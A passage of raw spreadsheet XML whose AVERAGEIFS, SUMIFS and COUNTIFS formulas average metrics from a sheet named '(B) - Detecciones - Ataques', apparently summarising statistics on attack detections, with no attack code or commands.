        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB140" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>4.659348739</v>
      </c>
      <c r="BN140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>15.88993331</v>
      </c>
      <c r="BO140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA140" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC140" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>2</v>
      </c>
      <c r="CL140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0.375</v>
      </c>
      <c r="CN140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0</v>
      </c>
      <c r="CP140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>9</v>
      </c>
      <c r="CQ140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.03775868706</v>
      </c>
      <c r="CT140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ140" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0</v>
      </c>
      <c r="DK140" s="271"/>
    </row>
    <row r="141">
      <c r="J141" s="277"/>
      <c r="K141" s="512"/>
      <c r="L141" s="512"/>
      <c r="M141" s="512"/>
      <c r="N141" s="512"/>
      <c r="O141" s="278"/>
      <c r="Q141" s="539"/>
      <c r="R141" s="386" t="s">
        <v>2560</v>
      </c>
      <c r="S141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.4546460657</v>
      </c>
      <c r="T141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="U141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.698433584</v>
      </c>
      <c r="V141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5833333333</v>
      </c>
      <c r="W141" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.4666666667</v>
      </c>
      <c r="Z141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>879.5112081</v>
      </c>
      <c r="AA141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.9615384615</v>
      </c>
      <c r="AB141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.697916667</v>
      </c>
      <c r="AC141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.5</v>
      </c>
      <c r="AD141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.5391997239</v>
      </c>
      <c r="AE141" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.9</v>
      </c>
      <c r="AF141" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DC$3:$DC$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.7727272727</v>
      </c>
      <c r="AG141" s="271"/>
      <c r="AH141" s="386" t="s">
        <v>2560</v>
      </c>
      <c r="AI141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.07595879798</v>
      </c>
      <c r="AJ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>2.5</v>
      </c>
      <c r="AL141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="AN141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AR141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1.5</v>
      </c>
      <c r="AV141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AW141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AY141" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB141" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD141" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG141" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DC$3:$DC$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH141" s="518">
